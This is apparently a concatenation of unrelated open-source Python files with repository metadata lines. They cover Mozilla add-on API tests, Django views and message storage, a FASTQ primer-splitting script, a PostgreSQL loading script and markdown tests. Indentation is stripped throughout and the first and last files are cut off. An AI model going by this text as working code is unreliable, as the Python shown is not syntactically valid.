addon=compatible_pack1, file_kw={'strict_compatibility': True},
min_app_version='58.0', max_app_version='58.*')
compatible_version1.update(created=self.days_ago(1))
compatible_pack2 = addon_factory(
name='French Language Pack',
type=amo.ADDON_LPAPP, target_locale='fr',
file_kw={'strict_compatibility': True},
version_kw={'min_app_version': '58.0', 'max_app_version': '58.*'})
compatible_version2 = compatible_pack2.current_version
compatible_version2.update(created=self.days_ago(1))
version_factory(
addon=compatible_pack2, file_kw={'strict_compatibility': True},
min_app_version='59.0', max_app_version='59.*')
# Add a more recent version for both add-ons, that would be compatible
# with 58.0, but is not public/listed so should not be returned.
version_factory(
addon=compatible_pack1, file_kw={'strict_compatibility': True},
min_app_version='58.0', max_app_version='58.*',
channel=amo.RELEASE_CHANNEL_UNLISTED)
version_factory(
addon=compatible_pack2,
file_kw={'strict_compatibility': True,
'status': amo.STATUS_DISABLED},
min_app_version='58.0', max_app_version='58.*')
# And for the first pack, add a couple of versions that are also
# compatible. We should not use them though, because we only need to
# return the latest public version that is compatible.
extra_compatible_version_1 = version_factory(
addon=compatible_pack1, file_kw={'strict_compatibility': True},
min_app_version='58.0', max_app_version='58.*')
extra_compatible_version_1.update(created=self.days_ago(3))
extra_compatible_version_2 = version_factory(
addon=compatible_pack1, file_kw={'strict_compatibility': True},
min_app_version='58.0', max_app_version='58.*')
extra_compatible_version_2.update(created=self.days_ago(4))
# Add a few of incompatible add-ons.
incompatible_pack1 = addon_factory(
name='German Language Pack (incompatible with 58.0)',
type=amo.ADDON_LPAPP, target_locale='fr',
file_kw={'strict_compatibility': True},
version_kw={'min_app_version': '56.0', 'max_app_version': '56.*'})
version_factory(
addon=incompatible_pack1, file_kw={'strict_compatibility': True},
min_app_version='59.0', max_app_version='59.*')
addon_factory(
name='Italian Language Pack (incompatible with 58.0)',
type=amo.ADDON_LPAPP, target_locale='it',
file_kw={'strict_compatibility': True},
version_kw={'min_app_version': '59.0', 'max_app_version': '59.*'})
addon_factory(
name='Thunderbird Polish Language Pack',
type=amo.ADDON_LPAPP, target_locale='pl',
file_kw={'strict_compatibility': True},
version_kw={
'application': amo.THUNDERBIRD.id,
'min_app_version': '58.0', 'max_app_version': '58.*'})
# Even add a pack with a compatible version... not public. And another
# one with a compatible version... not listed.
incompatible_pack2 = addon_factory(
name='Japanese Language Pack (public, but 58.0 version is not)',
type=amo.ADDON_LPAPP, target_locale='ja',
file_kw={'strict_compatibility': True},
version_kw={'min_app_version': '57.0', 'max_app_version': '57.*'})
version_factory(
addon=incompatible_pack2,
min_app_version='58.0', max_app_version='58.*',
file_kw={'status': amo.STATUS_AWAITING_REVIEW,
'strict_compatibility': True})
incompatible_pack3 = addon_factory(
name='Nederlands Language Pack (58.0 version is unlisted)',
type=amo.ADDON_LPAPP, target_locale='ja',
file_kw={'strict_compatibility': True},
version_kw={'min_app_version': '57.0', 'max_app_version': '57.*'})
version_factory(
addon=incompatible_pack3,
min_app_version='58.0', max_app_version='58.*',
channel=amo.RELEASE_CHANNEL_UNLISTED,
file_kw={'strict_compatibility': True})
# Test it.
with self.assertNumQueries(5):
# 5 queries, regardless of how many add-ons are returned:
# - 1 for the add-ons
# - 1 for the add-ons translations (name)
# - 1 for the compatible versions (through prefetch_related)
# - 1 for the applications versions for those versions
# (we don't need it, but we're using the default Version
# transformer to get the files... this could be improved.)
# - 1 for the files for those versions
response = self.client.get(
self.url,
{'app': 'firefox', 'appversion': '58.0', 'type': 'language',
'lang': 'en-US'})
assert response.status_code == 200, response.content
results = response.data['results']
assert len(results) == 2
# Ordering is not guaranteed by this API, but do check that the
# current_compatible_version returned makes sense.
assert results[0]['current_compatible_version']
assert results[1]['current_compatible_version']
expected_versions = set((
(compatible_pack1.pk, compatible_version1.pk),
(compatible_pack2.pk, compatible_version2.pk),
))
returned_versions = set((
(results[0]['id'], results[0]['current_compatible_version']['id']),
(results[1]['id'], results[1]['current_compatible_version']['id']),
))
assert expected_versions == returned_versions
def test_memoize(self):
addon_factory(type=amo.ADDON_DICT, target_locale='fr')
addon_factory(
type=amo.ADDON_DICT, target_locale='fr',
locale_disambiguation='For spelling reform')
addon_factory(type=amo.ADDON_LPAPP, target_locale='es')
addon_factory(
type=amo.ADDON_LPAPP, target_locale='de',
version_kw={'application': amo.THUNDERBIRD.id})
with self.assertNumQueries(2):
response = self.client.get(
self.url, {'app': 'firefox', 'lang': 'fr'})
assert response.status_code == 200
assert len(json.loads(response.content)['results']) == 3
# Same again, should be cached; no queries.
with self.assertNumQueries(0):
assert self.client.get(
self.url, {'app': 'firefox', 'lang': 'fr'}).content == (
response.content
)
with self.assertNumQueries(2):
assert (
self.client.get(
self.url, {'app': 'thunderbird', 'lang': 'fr'}).content !=
response.content
)
# Same again, should be cached; no queries.
with self.assertNumQueries(0):
self.client.get(self.url, {'app': 'thunderbird', 'lang': 'fr'})
# Change the lang, we should get queries again.
with self.assertNumQueries(2):
self.client.get(self.url, {'app': 'firefox', 'lang': 'de'})
class TestReplacementAddonView(TestCase):
client_class = APITestClient
def test_basic(self):
# Add a single addon replacement
rep_addon1 = addon_factory()
ReplacementAddon.objects.create(
guid='legacy2addon@moz',
path=urlunquote(rep_addon1.get_url_path()))
# Add a collection replacement
author = user_factory()
collection = collection_factory(author=author)
rep_addon2 = addon_factory()
rep_addon3 = addon_factory()
collection.set_addons([rep_addon2.id, rep_addon3.id])
ReplacementAddon.objects.create(
guid='legacy2collection@moz',
path=urlunquote(collection.get_url_path()))
# Add an invalid path
ReplacementAddon.objects.create(
guid='notgonnawork@moz',
path='/addon/áddonmissing/')
response = self.client.get(reverse_ns('addon-replacement-addon'))
assert response.status_code == 200
data = json.loads(response.content)
results = data['results']
assert len(results) == 3
assert ({'guid': 'legacy2addon@moz',
'replacement': [rep_addon1.guid]} in results)
assert ({'guid': 'legacy2collection@moz',
'replacement': [rep_addon2.guid, rep_addon3.guid]} in results)
assert ({'guid': 'notgonnawork@moz',
'replacement': []} in results)
class TestCompatOverrideView(TestCase):
client_class = APITestClient
def setUp(self):
self.addon = addon_factory(guid='extrabad@thing')
self.override_addon = CompatOverride.objects.create(
name='override with addon', guid=self.addon.guid, addon=self.addon)
CompatOverrideRange.objects.create(
compat=self.override_addon, app=amo.FIREFOX.id)
self.override_without = CompatOverride.objects.create(
name='override no addon', guid='bad@thing')
CompatOverrideRange.objects.create(
compat=self.override_without, app=amo.FIREFOX.id)
def test_single_guid(self):
response = self.client.get(
reverse_ns('addon-compat-override'),
data={'guid': u'extrabad@thing'})
assert response.status_code == 200
data = json.loads(response.content)
assert len(data['results']) == 1
result = data['results'][0]
assert result['addon_guid'] == 'extrabad@thing'
assert result['addon_id'] == self.addon.id
assert result['name'] == 'override with addon'
def test_multiple_guid(self):
response = self.client.get(
reverse_ns('addon-compat-override'),
data={'guid': u'extrabad@thing,bad@thing'})
assert response.status_code == 200
data = json.loads(response.content)
results = data['results']
assert len(results) == 2
assert results[0]['addon_guid'] == 'bad@thing'
assert results[0]['addon_id'] is None
assert results[0]['name'] == 'override no addon'
assert results[1]['addon_guid'] == 'extrabad@thing'
assert results[1]['addon_id'] == self.addon.id
assert results[1]['name'] == 'override with addon'
# Throw in some random invalid guids too that will be ignored.
response = self.client.get(
reverse_ns('addon-compat-override'),
data={'guid': (
u'extrabad@thing,invalid@guid,notevenaguid$,bad@thing')})
assert response.status_code == 200
data = json.loads(response.content)
results = data['results']
assert len(results) == 2
assert results[0]['addon_guid'] == 'bad@thing'
assert results[1]['addon_guid'] == 'extrabad@thing'
def test_no_guid_param(self):
response = self.client.get(
reverse_ns('addon-compat-override'),
data={'guid': u'invalid@thing'})
# Searching for non-matching guids, it should be an empty 200 response.
assert response.status_code == 200
assert len(json.loads(response.content)['results']) == 0
response = self.client.get(
reverse_ns('addon-compat-override'), data={'guid': ''})
# Empty query is a 400 because a guid is required for overrides.
assert response.status_code == 400
assert 'Empty, or no, guid parameter provided.' in response.content
response = self.client.get(
reverse_ns('addon-compat-override'))
# And no guid param should be a 400 too
assert response.status_code == 400
assert 'Empty, or no, guid parameter provided.' in response.content
class TestAddonRecommendationView(ESTestCase):
client_class = APITestClient
fixtures = ['base/users']
def setUp(self):
super(TestAddonRecommendationView, self).setUp()
self.url = reverse_ns('addon-recommendations')
patcher = mock.patch(
'olympia.addons.views.get_addon_recommendations')
self.get_recommendations_mock = patcher.start()
self.addCleanup(patcher.stop)
def tearDown(self):
super(TestAddonRecommendationView, self).tearDown()
self.empty_index('default')
self.refresh()
def perform_search(self, url, data=None, expected_status=200, **headers):
with self.assertNumQueries(0):
response = self.client.get(url, data, **headers)
assert response.status_code == expected_status, response.content
data = json.loads(response.content)
return data
def test_basic(self):
addon1 = addon_factory(id=101, guid='101@mozilla')
addon2 = addon_factory(id=102, guid='102@mozilla')
addon3 = addon_factory(id=103, guid='103@mozilla')
addon4 = addon_factory(id=104, guid='104@mozilla')
self.get_recommendations_mock.return_value = (
['101@mozilla', '102@mozilla', '103@mozilla', '104@mozilla'],
'recommended', 'no_reason')
self.refresh()
data = self.perform_search(
self.url, {'guid': 'foo@baa', 'recommended': 'False'})
self.get_recommendations_mock.assert_called_with('foo@baa', False)
assert data['outcome'] == 'recommended'
assert data['fallback_reason'] == 'no_reason'
assert data['count'] == 4
assert len(data['results']) == 4
result = data['results'][0]
assert result['id'] == addon1.pk
assert result['guid'] == '101@mozilla'
result = data['results'][1]
assert result['id'] == addon2.pk
assert result['guid'] == '102@mozilla'
result = data['results'][2]
assert result['id'] == addon3.pk
assert result['guid'] == '103@mozilla'
result = data['results'][3]
assert result['id'] == addon4.pk
assert result['guid'] == '104@mozilla'
@mock.patch('olympia.addons.views.get_addon_recommendations_invalid')
def test_less_than_four_results(self, get_addon_recommendations_invalid):
addon1 = addon_factory(id=101, guid='101@mozilla')
addon2 = addon_factory(id=102, guid='102@mozilla')
addon3 = addon_factory(id=103, guid='103@mozilla')
addon4 = addon_factory(id=104, guid='104@mozilla')
addon5 = addon_factory(id=105, guid='105@mozilla')
addon6 = addon_factory(id=106, guid='106@mozilla')
addon7 = addon_factory(id=107, guid='107@mozilla')
addon8 = addon_factory(id=108, guid='108@mozilla')
self.get_recommendations_mock.return_value = (
['101@mozilla', '102@mozilla', '103@mozilla', '104@mozilla'],
'recommended', None)
get_addon_recommendations_invalid.return_value = (
['105@mozilla', '106@mozilla', '107@mozilla', '108@mozilla'],
'failed', 'invalid')
self.refresh()
data = self.perform_search(
self.url, {'guid': 'foo@baa', 'recommended': 'True'})
self.get_recommendations_mock.assert_called_with('foo@baa', True)
assert data['outcome'] == 'recommended'
assert data['fallback_reason'] is None
assert data['count'] == 4
assert len(data['results']) == 4
result = data['results'][0]
assert result['id'] == addon1.pk
assert result['guid'] == '101@mozilla'
result = data['results'][1]
assert result['id'] == addon2.pk
assert result['guid'] == '102@mozilla'
result = data['results'][2]
assert result['id'] == addon3.pk
assert result['guid'] == '103@mozilla'
result = data['results'][3]
assert result['id'] == addon4.pk
assert result['guid'] == '104@mozilla'
# Delete one of the add-ons returned, making us use curated fallbacks
addon1.delete()
self.refresh()
data = self.perform_search(
self.url, {'guid': 'foo@baa', 'recommended': 'True'})
self.get_recommendations_mock.assert_called_with('foo@baa', True)
assert data['outcome'] == 'failed'
assert data['fallback_reason'] == 'invalid'
assert data['count'] == 4
assert len(data['results']) == 4
result = data['results'][0]
assert result['id'] == addon5.pk
assert result['guid'] == '105@mozilla'
result = data['results'][1]
assert result['id'] == addon6.pk
assert result['guid'] == '106@mozilla'
result = data['results'][2]
assert result['id'] == addon7.pk
assert result['guid'] == '107@mozilla'
result = data['results'][3]
assert result['id'] == addon8.pk
assert result['guid'] == '108@mozilla'
def test_es_queries_made_no_results(self):
self.get_recommendations_mock.return_value = (
['@a', '@b'], 'foo', 'baa')
with patch.object(
Elasticsearch, 'search',
wraps=amo.search.get_es().search) as search_mock:
with patch.object(
Elasticsearch, 'count',
wraps=amo.search.get_es().count) as count_mock:
data = self.perform_search(self.url, data={'guid': '@foo'})
assert data['count'] == 0
assert len(data['results']) == 0
assert search_mock.call_count == 1
assert count_mock.call_count == 0
def test_es_queries_made_results(self):
addon_factory(slug='foormidable', name=u'foo', guid='@a')
addon_factory(slug='foobar', name=u'foo', guid='@b')
addon_factory(slug='fbar', name=u'foo', guid='@c')
addon_factory(slug='fb', name=u'foo', guid='@d')
self.refresh()
self.get_recommendations_mock.return_value = (
['@a', '@b', '@c', '@d'], 'recommended', None)
with patch.object(
Elasticsearch, 'search',
wraps=amo.search.get_es().search) as search_mock:
with patch.object(
Elasticsearch, 'count',
wraps=amo.search.get_es().count) as count_mock:
data = self.perform_search(
self.url, data={'guid': '@foo', 'recommended': 'true'})
assert data['count'] == 4
assert len(data['results']) == 4
assert search_mock.call_count == 1
assert count_mock.call_count == 0
|
lavish205/olympia
|
src/olympia/addons/tests/test_views.py
|
Python
|
bsd-3-clause
| 160,052
|
# coding: utf-8
# Copyright (C) 2017 Open Path View, Maison Du Libre
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License along
# with this program. If not, see <http://www.gnu.org/licenses/>.
# Contributors: Benjamin BERNARD <benjamin.bernard@openpathview.fr>
# Email: team@openpathview.fr
# Description: Utils for makelot.
def bit_len(int_type: int) -> int:
"""
Returns int_type length, position of last non 0 bit.
:param int_type: An int value.
:type int_type: int
:return: position of last non 0 bit.
:rtype: int
"""
length = 0
while (int_type):
int_type >>= 1
length += 1
return(length)
|
OpenPathView/batchPanoMaker
|
opv_import/helpers/bit_utils.py
|
Python
|
gpl-3.0
| 1,156
|
from django.views.generic import ListView, DetailView, CreateView, \
DeleteView, UpdateView, \
ArchiveIndexView, DateDetailView, \
DayArchiveView, MonthArchiveView, \
TodayArchiveView, WeekArchiveView, \
YearArchiveView
from baseapp.models import Class_Studying
from django.contrib import auth, messages
class Class_StudyingView(object):
model = Class_Studying
def get_template_names(self):
"""Nest templates within class_studying directory."""
tpl = super(Class_StudyingView, self).get_template_names()[0]
app = self.model._meta.app_label
mdl = 'class_studying'
self.template_name = tpl.replace(app, '{0}/{1}'.format(app, mdl))
return [self.template_name]
class Class_StudyingDateView(Class_StudyingView):
date_field = 'created_date'
month_format = '%m'
class Class_StudyingBaseListView(Class_StudyingView):
paginate_by = 10
class Class_StudyingArchiveIndexView(
Class_StudyingDateView, Class_StudyingBaseListView, ArchiveIndexView):
def get_success_url(self):
from django.core.urlresolvers import reverse
return reverse('baseapp_class_studying_list')
class Class_StudyingCreateView(Class_StudyingView, CreateView):
def get_success_url(self):
from django.core.urlresolvers import reverse
messages.add_message(
self.request,
messages.SUCCESS,"Successfully created."
)
return reverse('baseapp_class_studying_list')
class Class_StudyingDateDetailView(Class_StudyingDateView, DateDetailView):
def get_success_url(self):
from django.core.urlresolvers import reverse
return reverse('baseapp_class_studying_list')
class Class_StudyingDayArchiveView(
Class_StudyingDateView, Class_StudyingBaseListView, DayArchiveView):
def get_success_url(self):
from django.core.urlresolvers import reverse
return reverse('baseapp_class_studying_list')
class Class_StudyingDeleteView(Class_StudyingView, DeleteView):
def get_success_url(self):
from django.core.urlresolvers import reverse
return reverse('baseapp_class_studying_list')
class Class_StudyingDetailView(Class_StudyingView, DetailView):
def get_success_url(self):
from django.core.urlresolvers import reverse
return reverse('baseapp_class_studying_list')
class Class_StudyingListView(Class_StudyingBaseListView, ListView):
def get_success_url(self):
from django.core.urlresolvers import reverse
return reverse('baseapp_class_studying_list')
class Class_StudyingMonthArchiveView(
Class_StudyingDateView, Class_StudyingBaseListView, MonthArchiveView):
def get_success_url(self):
from django.core.urlresolvers import reverse
return reverse('baseapp_class_studying_list')
class Class_StudyingTodayArchiveView(
Class_StudyingDateView, Class_StudyingBaseListView, TodayArchiveView):
def get_success_url(self):
from django.core.urlresolvers import reverse
return reverse('baseapp_class_studying_list')
class Class_StudyingUpdateView(Class_StudyingView, UpdateView):
def get_success_url(self):
from django.core.urlresolvers import reverse
return reverse('baseapp_class_studying_list')
class Class_StudyingWeekArchiveView(
Class_StudyingDateView, Class_StudyingBaseListView, WeekArchiveView):
def get_success_url(self):
from django.core.urlresolvers import reverse
return reverse('baseapp_class_studying_list')
class Class_StudyingYearArchiveView(
Class_StudyingDateView, Class_StudyingBaseListView, YearArchiveView):
make_object_list = True
|
tnemis/staging-server
|
baseapp/views/class_studying_views.py
|
Python
|
mit
| 3,912
|
from authenticated import AuthenticatedHandler
import models
import logging
class EditPage(AuthenticatedHandler):
def auth_get(self, page_path):
self.render_form(page_path)
def auth_post(self, page_path):
page_id = self.request.get('v')
page_content = self.request.get('content')
wikipage = models.WikiPage.by_path_or_id(page_path, page_id)
if wikipage and page_content == wikipage.content:
self.redirect(page_path)
return
models.WikiPage.create(page_path = page_path, page_content = page_content,
author = self.account)
self.redirect(page_path)
def render_form(self, page_path):
version = self.request.get('v')
wikipage = models.WikiPage.by_path_or_id(page_path, version)
self.render('edit_page',
editing = True,
page_title = 'WikiPage: %s' % page_path,
page_path = page_path,
page_version = version,
page_html = wikipage.content if wikipage else '',
is_new_page = not wikipage)
|
zxul767/Wikipages
|
edit.py
|
Python
|
gpl-2.0
| 1,154
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Script to separate genes from MiSeq run fastQ files (NEXTERA style)
AFTER the reads have been trimmed for the tail and adapter (see trim_adaptors.py)
Trim forward and reverse primers.
It will produce one file for each gene (4 here - 16S, 18S, UPA, tufA)
Created on Mon Jul 28 17:27:33 2014
@author: VanessaRM
"""
""" USAGE:
python speratae_genes.py my_fastq_file.fastq
"""
from Bio import SeqIO
import regex
import sys
# Help text
if len(sys.argv) == 1:
print ""
print "Script to separate genes and trim primers from a fastQ file."
print "Allows one mismatch in the primer sequence"
print ""
print "Usage: supply the file name"
print "ex: python speratae_genes.py my_fastq_file.fastq"
print ""
print "If you want to run it for multiple files, use the shell:"
print "for file in *_R1_001.fastq; do python separate_genes.py $file; done >> screen.out 2>> screen.err &"
print ""
sys.exit()
# input files and arguments:
input_file = str(sys.argv[1])
output_file_16S = input_file + "_16S.fastq"
output_file_18S = input_file + "_18S.fastq"
output_file_UPA = input_file + "_UPA.fastq"
output_file_tufA = input_file + "_tufA.fastq"
output_file_umatched = input_file + "_unmatched.fastq"
# Globals
finder = ""
# Create lists to store seqs
#all_seqs =[] #just to see if the code behaves well
s16_list =[]
s18_list = []
UPA_list=[]
tufA_list =[]
unmatched=[]
# Forward Primers (\w = ambiguous positions, only 12 "internal" bases used), allowing for 1 mismatch.
p16S_f = '(GTGCCAGC\wGCCGCGGTAA){e<=1}' #F515
p18S_f = '(GGTGGTGCATGGCCGTTCTTAGTT){e<=1}' #NF1
pUPA_f = '(GGACAGAAAGACCCTATGAA){e<=1}' #p23SrV_f1
ptufA_f = '(AC\wGG\wCG\wGG\wAC\wGT){e<=1}' #Oq_tuf2F
#Reverse primers(their reverse complement):
p16S_r = '(ATTAGA\wACCC\w\wGTAGTCC){e<=1}' #R806 rc ATTAGAWACCCBDGTAGTCC
p18S_r = '(ATTACGTCCCTGCCCTTTGTA){e<=1}' # B18Sr2B rc
pUPA_r = '(CTCTAGGGATAACAGGCTGA){e<=1}' #p23SrV_r1 rc
ptufA_r = '(GCG\wTT\wGC\wATTCG\wGAAGG){e<=1}' #tufAR rc
#define primer_finder function
def primer_finder (records, primer_f1, primer_r1, primer_f2, primer_r2, primer_f3, primer_r3, primer_f4, primer_r4):
"Trims the primers and saves the sequences in amplicon-separated files. Put primers in order: 16S, 18S, UPA, tufA"
for record in records:
sequence = str(record.seq)
#Initial values of cut_off - in case you don't need to trim anything
cut_off_f= 0
cut_off_r = len(sequence)
#Search the primers f and r
index_f = regex.search((primer_f1), sequence)
index_r = regex.search((primer_r1), sequence)
if index_f != None:
#found the forward primer, so define where the sequence needs to be trimmed
cut_off_f = int(index_f.span()[1])
if index_r != None:
#found the reverse primer
cut_off_r = int(index_r.span()[0]+1) #the +1 is to cut just when the primer starts.
#Store the trimmed seq
if index_f or index_r != None:
s16_list.append(record [cut_off_f:cut_off_r])
else: #search for next primer
index_f = regex.search((primer_f2), sequence)
index_r = regex.search((primer_r2), sequence)
if index_f != None:
cut_off_f = int(index_f.span()[1])
if index_r != None:
cut_off_r = int(index_r.span()[0]+1)
if index_f or index_r != None:
s18_list.append(record [cut_off_f:cut_off_r])
else:
index_f = regex.search((primer_f3), sequence)
index_r = regex.search((primer_r3), sequence)
if index_f != None:
cut_off_f = int(index_f.span()[1])
if index_r != None:
cut_off_r = int(index_r.span()[0]+1)
if index_f or index_r != None:
UPA_list.append(record [cut_off_f:cut_off_r])
else:
index_f = regex.search((primer_f4), sequence)
index_r = regex.search((primer_r4), sequence)
if index_f != None:
cut_off_f = int(index_f.span()[1])
if index_r != None:
cut_off_r = int(index_r.span()[0]+1)
if index_f or index_r != None:
tufA_list.append(record [cut_off_f:cut_off_r])
else:
unmatched.append(record)
#Iterate over fastq file
print ("separating genes... It can take a while...")
original_reads = SeqIO.parse(input_file, "fastq")
do_it = primer_finder(original_reads,p16S_f,p16S_r,p18S_f,p18S_r,pUPA_f,pUPA_r,ptufA_f,ptufA_r)
count_um = SeqIO.write(unmatched, output_file_umatched, "fastq")
print ""
print "%i sequences did not match the primers and were stored in the %s file." %(count_um, output_file_umatched)
print ""
count_16S = SeqIO.write(s16_list, output_file_16S, "fastq")
print"",
print "Saved %i reads in the %s file." %(count_16S, output_file_16S)
count_18S = SeqIO.write(s18_list, output_file_18S, "fastq")
print""
print "Saved %i reads in the %s file." %(count_18S, output_file_18S)
count_UPA = SeqIO.write(UPA_list, output_file_UPA, "fastq")
print""
print "Saved %i reads in the %s file." %(count_UPA, output_file_UPA)
count_tufA = SeqIO.write(tufA_list, output_file_tufA, "fastq")
print""
print "Saved %i reads in the %s file." %(count_tufA, output_file_tufA)
print""
print "Done!"
|
vrmarcelino/Shape-4-Qiime
|
separate_genes.py
|
Python
|
mit
| 5,655
|
from __future__ import unicode_literals
from django.conf import settings
from django.utils.encoding import force_text, python_2_unicode_compatible
from django.contrib.messages import constants, utils
LEVEL_TAGS = utils.get_level_tags()
@python_2_unicode_compatible
class Message(object):
"""
Represents an actual message that can be stored in any of the supported
storage classes (typically session- or cookie-based) and rendered in a view
or template.
"""
def __init__(self, level, message, extra_tags=None):
self.level = int(level)
self.message = message
self.extra_tags = extra_tags
def _prepare(self):
"""
Prepares the message for serialization by forcing the ``message``
and ``extra_tags`` to unicode in case they are lazy translations.
Known "safe" types (None, int, etc.) are not converted (see Django's
``force_text`` implementation for details).
"""
self.message = force_text(self.message, strings_only=True)
self.extra_tags = force_text(self.extra_tags, strings_only=True)
def __eq__(self, other):
return isinstance(other, Message) and self.level == other.level and \
self.message == other.message
def __str__(self):
return force_text(self.message)
def _get_tags(self):
label_tag = force_text(LEVEL_TAGS.get(self.level, ''),
strings_only=True)
extra_tags = force_text(self.extra_tags, strings_only=True)
if extra_tags and label_tag:
return ' '.join([extra_tags, label_tag])
elif extra_tags:
return extra_tags
elif label_tag:
return label_tag
return ''
tags = property(_get_tags)
class BaseStorage(object):
"""
This is the base backend for temporary message storage.
This is not a complete class; to be a usable storage backend, it must be
subclassed and the two methods ``_get`` and ``_store`` overridden.
"""
def __init__(self, request, *args, **kwargs):
self.request = request
self._queued_messages = []
self.used = False
self.added_new = False
super(BaseStorage, self).__init__(*args, **kwargs)
def __len__(self):
return len(self._loaded_messages) + len(self._queued_messages)
def __iter__(self):
self.used = True
if self._queued_messages:
self._loaded_messages.extend(self._queued_messages)
self._queued_messages = []
return iter(self._loaded_messages)
def __contains__(self, item):
return item in self._loaded_messages or item in self._queued_messages
@property
def _loaded_messages(self):
"""
Returns a list of loaded messages, retrieving them first if they have
not been loaded yet.
"""
if not hasattr(self, '_loaded_data'):
messages, all_retrieved = self._get()
self._loaded_data = messages or []
return self._loaded_data
def _get(self, *args, **kwargs):
"""
Retrieves a list of stored messages. Returns a tuple of the messages
and a flag indicating whether or not all the messages originally
intended to be stored in this storage were, in fact, stored and
retrieved; e.g., ``(messages, all_retrieved)``.
**This method must be implemented by a subclass.**
If it is possible to tell if the backend was not used (as opposed to
just containing no messages) then ``None`` should be returned in
place of ``messages``.
"""
raise NotImplementedError('subclasses of BaseStorage must provide a _get() method')
def _store(self, messages, response, *args, **kwargs):
"""
Stores a list of messages, returning a list of any messages which could
not be stored.
One type of object must be able to be stored, ``Message``.
**This method must be implemented by a subclass.**
"""
raise NotImplementedError('subclasses of BaseStorage must provide a _store() method')
def _prepare_messages(self, messages):
"""
Prepares a list of messages for storage.
"""
for message in messages:
message._prepare()
def update(self, response):
"""
Stores all unread messages.
If the backend has yet to be iterated, previously stored messages will
be stored again. Otherwise, only messages added after the last
iteration will be stored.
"""
self._prepare_messages(self._queued_messages)
if self.used:
return self._store(self._queued_messages, response)
elif self.added_new:
messages = self._loaded_messages + self._queued_messages
return self._store(messages, response)
def add(self, level, message, extra_tags=''):
"""
Queues a message to be stored.
The message is only queued if it contained something and its level is
not less than the recording level (``self.level``).
"""
if not message:
return
# Check that the message level is not less than the recording level.
level = int(level)
if level < self.level:
return
# Add the message.
self.added_new = True
message = Message(level, message, extra_tags=extra_tags)
self._queued_messages.append(message)
def _get_level(self):
"""
Returns the minimum recorded level.
The default level is the ``MESSAGE_LEVEL`` setting. If this is
not found, the ``INFO`` level is used.
"""
if not hasattr(self, '_level'):
self._level = getattr(settings, 'MESSAGE_LEVEL', constants.INFO)
return self._level
def _set_level(self, value=None):
"""
Sets a custom minimum recorded level.
If set to ``None``, the default level will be used (see the
``_get_level`` method).
"""
if value is None and hasattr(self, '_level'):
del self._level
else:
self._level = int(value)
level = property(_get_level, _set_level, _set_level)
|
ericholscher/django
|
django/contrib/messages/storage/base.py
|
Python
|
bsd-3-clause
| 6,265
|
# The main entrance for the optimization framework of energy router
T = 24
|
Matrixeigs/Optimization
|
main.py
|
Python
|
mit
| 76
|
#python
import testing
testing.bitmap_modifier_benchmark("CUDABitmapMultiply")
|
barche/k3d
|
tests/bitmap/bitmap.modifier.CUDABitmapMultiply.benchmark.py
|
Python
|
gpl-2.0
| 81
|
#!/usr/bin/env python3
import json
import psycopg2
def drop_tables(db, user):
print('droping tables')
sql_drop_repos_table = 'DROP TABLE IF EXISTS repos'
sql_drop_issues_table = 'DROP TABLE IF EXISTS issues'
sql_drop_labels_table = 'DROP TABLE IF EXISTS labels'
try:
conn = psycopg2.connect(database=db, user=user)
cur = conn.cursor()
cur.execute(sql_drop_issues_table)
cur.execute(sql_drop_repos_table)
cur.execute(sql_drop_labels_table)
except psycopg2.DatabaseError as e:
print(e)
else:
conn.commit()
finally:
if cur:
cur.close()
if conn:
conn.close()
print('tables dropped\n')
def create_repos_table(db, user, json_fpath):
print('creating repos table')
with open(json_fpath, 'r') as f:
repos = json.load(f)
try:
conn = psycopg2.connect(database=db, user=user)
cur = conn.cursor()
sql_create_table = ('CREATE TABLE repos (id integer PRIMARY KEY, data jsonb);')
cur.execute(sql_create_table)
for r in repos:
sql_insert = 'INSERT INTO repos (id, data) VALUES (%s, %s::jsonb) ON CONFLICT DO NOTHING;'
cur.execute(sql_insert, (r['id'], json.dumps(r),))
except psycopg2.DatabaseError as e:
print(e)
else:
conn.commit()
finally:
cur.close()
conn.close()
print('repos table created\n')
def create_issues_table(db, user, json_fpath):
print('creating issues table')
with open(json_fpath, 'r') as f:
issues = json.load(f)
try:
conn = psycopg2.connect(database=db, user=user)
cur = conn.cursor()
sql_create_table = 'CREATE TABLE issues (id integer PRIMARY KEY, repo_id integer REFERENCES repos(id), data jsonb);'
cur.execute(sql_create_table)
for i in issues:
sql_insert = 'INSERT INTO issues (id, repo_id, data) VALUES (%s, %s, %s::jsonb) ON CONFLICT DO NOTHING;'
cur.execute(sql_insert, (i['id'], i['repo_id'], json.dumps(i),))
except psycopg2.DatabaseError as e:
print(e)
else:
conn.commit()
finally:
cur.close()
conn.close()
print('issues table created\n')
def create_labels_table(db, user, json_fpath):
print('creating labels table')
with open(json_fpath, 'r') as f:
labels = json.load(f)
try:
conn = psycopg2.connect(database=db, user=user)
cur = conn.cursor()
sql_create_table = 'CREATE TABLE labels (id serial PRIMARY KEY, name varchar);'
cur.execute(sql_create_table)
for l in labels:
sql_insert = 'INSERT INTO labels (name) VALUES (%s) ON CONFLICT DO NOTHING;'
cur.execute(sql_insert, (l,))
except psycopg2.DatabaseError as e:
print(e)
else:
conn.commit()
finally:
cur.close()
conn.close()
print('labels table created\n')
if __name__ == '__main__':
print('===== DB Creation Start =====')
# conn = psycopg2.connect('dbname=db user=user host=localhost password=xxx')
with open('./config.json', 'r') as f:
config = json.load(f)
db = config['db']
user = config['user']
drop_tables(db, user)
create_repos_table(db, user, './data/repos.json')
create_issues_table(db, user, './data/issues.json')
create_labels_table(db, user, './data/labels.json')
print('===== DB Creation Complete =====')
|
JmeHsieh/issue_aggregator
|
j2jb.py
|
Python
|
mit
| 3,496
|
# encoding: utf-8
from lxml.etree import LIBXML_VERSION
import pytest
from libweasyl.text import markdown, markdown_excerpt, markdown_link
libxml_xfail = pytest.mark.xfail(LIBXML_VERSION < (2, 9), reason='libxml2 too old to preserve whitespace')
user_linking_markdown_tests = [
('<~spam>', '<a href="/~spam">spam</a>'),
('<!spam>', '<a href="/~spam" class="user-icon"><img src="/~spam/avatar" alt="spam"></a>'),
('',
'<a href="/~spam" class="user-icon"><img src="/~spam/avatar" alt="spam"></a>'
